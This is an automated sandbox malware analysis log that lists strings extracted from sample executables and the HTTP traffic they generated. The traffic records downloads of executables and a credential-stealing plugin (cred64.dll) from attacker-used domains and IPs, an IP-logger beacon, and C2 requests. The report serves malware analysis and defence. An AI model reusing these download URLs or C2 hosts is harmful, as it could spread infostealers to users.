                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22ResponseX%
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23Response
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24Response
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                      Source: F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2ResponseX%
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                      Source: F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4X%
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                      Source: B4A7.exe.1.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
                      Source: B4A7.exe.1.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
                      Source: B4A7.exe.1.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
                      Source: explorer.exe, 00000027.00000002.772302955.00000000008F1000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.google.com/search
                      Source: EB2B.exe, 00000024.00000002.596309446.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, EB2B.exe, 00000024.00000002.568686695.0000000027195000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                      Source: 39680000161077974836781923.36.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: RegSvcs.exe, 0000002F.00000002.624937486.000000C0000F4000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000002F.00000002.633216729.000000C0001FA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ServiceLogin?service=youtube&passive=1209600&continue=https%3A%2F%2Fwww.
                      Source: B4A7.exe, 0000000D.00000003.527908931.000000000D290000.00000004.00000800.00020000.00000000.sdmp, B4A7.exe, 0000000D.00000003.533006922.000000000D292000.00000040.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.848936854.000000000263A000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.850270333.00000000027A0000.00000004.08000000.00040000.00000000.sdmp, F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/ip
                      Source: 39680000161077974836781923.36.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: RegSvcs.exe, 0000002F.00000002.624795195.000000C0000EC000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000002F.00000002.633216729.000000C0001FA000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000002F.00000002.633902080.000000C00021A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/youtube_main
                      Source: B4A7.exe.1.drString found in binary or memory: https://d.symcb.com/cps0%
                      Source: B4A7.exe.1.drString found in binary or memory: https://d.symcb.com/rpa0
                      Source: B4A7.exe.1.drString found in binary or memory: https://d.symcb.com/rpa0.
                      Source: EB2B.exe, 00000024.00000003.486203645.00000000275DE000.00000004.00000800.00020000.00000000.sdmp, 65329382289861898742549564.36.dr, 42917201296364153697665931.36.drString found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BBD4EA3DA
                      Source: 39680000161077974836781923.36.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: F771.exe, 00000020.00000002.856653515.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp, EB2B.exe, 00000024.00000003.491597267.00000000275E1000.00000004.00000800.00020000.00000000.sdmp, 45253720055769576867799735.36.dr, 39680000161077974836781923.36.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: 39680000161077974836781923.36.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: F771.exe, 00000020.00000002.856653515.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp, EB2B.exe, 00000024.00000003.491597267.00000000275E1000.00000004.00000800.00020000.00000000.sdmp, 45253720055769576867799735.36.dr, 39680000161077974836781923.36.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                      Source: F771.exe, 00000020.00000002.856653515.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp, EB2B.exe, 00000024.00000003.491597267.00000000275E1000.00000004.00000800.00020000.00000000.sdmp, 45253720055769576867799735.36.dr, 39680000161077974836781923.36.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
                      Source: EB2B.exe, 00000024.00000003.491597267.00000000275E1000.00000004.00000800.00020000.00000000.sdmp, 45253720055769576867799735.36.dr, 39680000161077974836781923.36.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
                      Source: F771.exe, 00000020.00000002.856653515.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp, EB2B.exe, 00000024.00000003.491597267.00000000275E1000.00000004.00000800.00020000.00000000.sdmp, 45253720055769576867799735.36.dr, 39680000161077974836781923.36.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
                      Source: RegSvcs.exe, 0000002F.00000002.570733528.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://studio.youtube.com/reauth
                      Source: RegSvcs.exe, 0000002F.00000002.570733528.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://studio.youtube.com/youtubei/v1/ars/grst?alt=json&key=net/http:
                      Source: RegSvcs.exe, 0000002F.00000002.570733528.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://studio.youtube.com/youtubei/v1/att/esr?alt=json&key=https://studio.youtube.com/youtubei/v1/a
                      Source: RegSvcs.exe, 0000002F.00000002.570733528.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://studio.youtube.com/youtubei/v1/security/get_web_reauth_url?alt=json&key=tls:
                      Source: RegSvcs.exe, 0000002F.00000002.570733528.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://studio.youtube.com28421709430404007434844970703125:
                      Source: RegSvcs.exe, 0000002F.00000002.570733528.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://studio.youtube.comid
                      Source: 42917201296364153697665931.36.drString found in binary or memory: https://support.google.com/chrome/answer/111996?visit_id=637962485686793996-3320600880&p=update_erro
                      Source: 42917201296364153697665931.36.drString found in binary or memory: https://support.google.com/chrome/answer/6315198?product=
                      Source: EB2B.exe, 00000024.00000002.584817068.00000000276DC000.00000004.00000800.00020000.00000000.sdmp, EB2B.exe, 00000024.00000003.488205767.00000000273DD000.00000004.00000800.00020000.00000000.sdmp, EB2B.exe, 00000024.00000003.488388825.00000000275EA000.00000004.00000800.00020000.00000000.sdmp, 65329382289861898742549564.36.dr, 42917201296364153697665931.36.drString found in binary or memory: https://support.google.com/chrome?p=update_error
                      Source: 42917201296364153697665931.36.drString found in binary or memory: https://support.google.com/chrome?p=update_errorFix
                      Source: 42917201296364153697665931.36.drString found in binary or memory: https://support.google.com/installer/?product=
                      Source: EB2B.exe, 0000001C.00000002.454935093.0000000000B40000.00000004.00000800.00020000.00000000.sdmp, EB2B.exe, 0000001F.00000002.471247692.0000000000C50000.00000004.00000800.00020000.00000000.sdmp, EB2B.exe, 00000024.00000002.519975927.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/deadftx
                      Source: EB2B.exe, 0000001C.00000002.454935093.0000000000B40000.00000004.00000800.00020000.00000000.sdmp, EB2B.exe, 0000001F.00000002.471247692.0000000000C50000.00000004.00000800.00020000.00000000.sdmp, EB2B.exe, 00000024.00000002.519975927.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/deadftxhttps://www.tiktok.com/
                      Source: F771.exe, 00000020.00000002.856653515.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp, EB2B.exe, 00000024.00000003.491597267.00000000275E1000.00000004.00000800.00020000.00000000.sdmp, 45253720055769576867799735.36.dr, 39680000161077974836781923.36.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: 42917201296364153697665931.36.drString found in binary or memory: https://www.google.com/intl/en_uk/chrome/
                      Source: 65329382289861898742549564.36.dr, 42917201296364153697665931.36.drString found in binary or memory: https://www.google.com/intl/en_uk/chrome/Google
                      Source: EB2B.exe, 00000024.00000003.486203645.00000000275DE000.00000004.00000800.00020000.00000000.sdmp, EB2B.exe, 00000024.00000003.488632208.00000000273DD000.00000004.00000800.00020000.00000000.sdmp, 65329382289861898742549564.36.dr, 42917201296364153697665931.36.drString found in binary or memory: https://www.google.com/intl/en_uk/chrome/https://www.google.com/intl/en_uk/chrome/https://www.google
                      Source: 42917201296364153697665931.36.drString found in binary or memory: https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrows
                      Source: 42917201296364153697665931.36.drString found in binary or memory: https://www.google.com/search?q=chrome&oq=chrome&aqs=chrome..69i57j0j5l3j69i60l3.2663j0j4&sourceid=c
                      Source: EB2B.exe, 0000001C.00000002.454935093.0000000000B40000.00000004.00000800.00020000.00000000.sdmp, EB2B.exe, 0000001F.00000002.471247692.0000000000C50000.00000004.00000800.00020000.00000000.sdmp, EB2B.exe, 00000024.00000002.519975927.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.tiktok.com/
                      Source: RegSvcs.exe, 0000002F.00000002.623396941.000000C0000AA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                      Source: RegSvcs.exe, 0000002F.00000002.623527954.000000C0000BC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/getAccountSwitcherEndpoint
                      Source: RegSvcs.exe, 0000002F.00000002.623527954.000000C0000BC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/getAccountSwitcherEndpoint2022/11/19
                      Source: RegSvcs.exe, 0000002F.00000002.570733528.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/getAccountSwitcherEndpointmallocgc
                      Source: RegSvcs.exe, 0000002F.00000002.623396941.000000C0000AA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com65.21.213.208:3000
                      Source: RegSvcs.exe, 0000002F.00000002.570733528.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.comindex
                      Source: unknownDNS traffic detected: queries for: o36fafs3sn6xou.com
                      Source: C:\Users\user\AppData\Local\Temp\A852.exeCode function: 12_2_00404180 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,
                      Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
                      Source: global trafficHTTP traffic detected: GET /mmm.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: srshf.com
                      Source: global trafficHTTP traffic detected: GET /2bibu4 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: iplogger.com
                      Source: global trafficHTTP traffic detected: GET /p8DdCeH9yd/c1844f86-1668548628/TELEGRAM.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn-102.anonfiles.com
                      Source: global trafficHTTP traffic detected: GET /p8DdCeH9yd HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: anonfiles.com
                      Source: global trafficHTTP traffic detected: GET /get/3m3jFz/A.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: transfer.sh
                      Source: global trafficHTTP traffic detected: GET /ugzpqm9.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: hoteldostyk.com
                      Source: global trafficHTTP traffic detected: GET /get/tSjRYH/19a79daddfaac09499e79ade27e756f8.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: transfer.sh
                      Source: global trafficHTTP traffic detected: GET /decoder1989/Wallet/raw/main/Crypted.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: github.com
                      Source: global trafficHTTP traffic detected: GET /decoder1989/Wallet/main/Crypted.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: raw.githubusercontent.com
                      Source: global trafficHTTP traffic detected: GET /globallinstall/updatenow1.3.5/downloads/downloadsupdated.now-1.3.5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bitbucket.org
                      Source: global trafficHTTP traffic detected: GET /d4f3490a-2e84-4c12-88ef-beba9da933c3/downloads/82212016-bde4-4df5-aab8-956b348984a7/downloadsupdated.now-1.3.5.exe?response-content-disposition=attachment%3B%20filename%3D%22downloadsupdated.now-1.3.5.exe%22&AWSAccessKeyId=ASIA6KOSE3BNOZOOHY3N&Signature=GzL5wNnYpYwPSxOn1UYsedXak5E%3D&x-amz-security-token=FwoGZXIvYXdzEGkaDDNVNRyg9tKrdDSjmyK%2BAXLhpeezu2dvyjwAVkUCy7lu%2FXCp1HgdKpL8mWGBdvveL8Mo1QmIKfJ8iZDr9Xw%2BctzLwJ5Sf8n0lCS3jHhbhlYs0X0busuSvW%2FVq%2FfMaY78aRaS988rXTG%2FflifkvhzKIeH%2BV49O7mXy47GBzjy3fPmNnCGaKTJZeSSWbSd72NLL%2BaCGtTc9Tc3XZ5ZqTwHNQpXotjT6eruy14GLWwhFcV6JdFES%2Flh7KQl3xIhJb9lB%2FMhsn%2BO2tK9c9Nn06YoifbjmwYyLaTpvNZdDFBcQvsXCLyHYDaiEW7KrV%2Fc7h%2BKDDqJqtgq%2BRvSwG3A3zzYSvK0GQ%3D%3D&Expires=1668874769 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bbuseruploads.s3.amazonaws.com
                      Source: global trafficHTTP traffic detected: GET /deadftx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0;x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.me
                      Source: global trafficHTTP traffic detected: GET /getAccountSwitcherEndpoint HTTP/1.1Host: www.youtube.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
                      Source: global trafficHTTP traffic detected: GET /mia/solt.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 193.56.146.168
                      Source: global trafficHTTP traffic detected: GET /g84kvj4jck/Plugins/cred64.dll HTTP/1.1Host: 193.56.146.174
                      Source: global trafficHTTP traffic detected: GET /1148 HTTP/1.1Host: 116.202.5.101
                      Source: global trafficHTTP traffic detected: GET /446391140202.zip HTTP/1.1Host: 116.202.5.101Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /uploaded/MKJXzaDhWJDhe4sLrAp/202wE1vmJGyOwE4wnEYueW/_2FfFWmpLaA_2/F_2BQz5L/X3BHK9zQ3HPerTbhJpXzdiC/pUWTziFQ6a/6yCvS5D9SUcdt4sBF/gRv1MAfNJypf/45_2BAajPNT/d0DhscZUUsYYbj/GTcrjG7fiLjLppaaVvzrf/Y24KXriHXc3NY43T/ctpVATPI_2Fr0Pi/_2FHw6oRT9JyY2ksfC/Ba_2BHWOY/RtKKX_2BievpS4UJpDK8/QiXiZjxP9y_2Fi9Irvn/1tIj7yvgcoxlqHZDD_2FkN/cDourswJ/7.pct HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: iujdhsndjfks.ruConnection: Keep-AliveCache-Control: no-cache
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49682 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49689 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49681 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49689
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49690 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49684 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49687 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 15:58:03 GMTServer: ApacheCache-Control: no-cache, privateUpgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
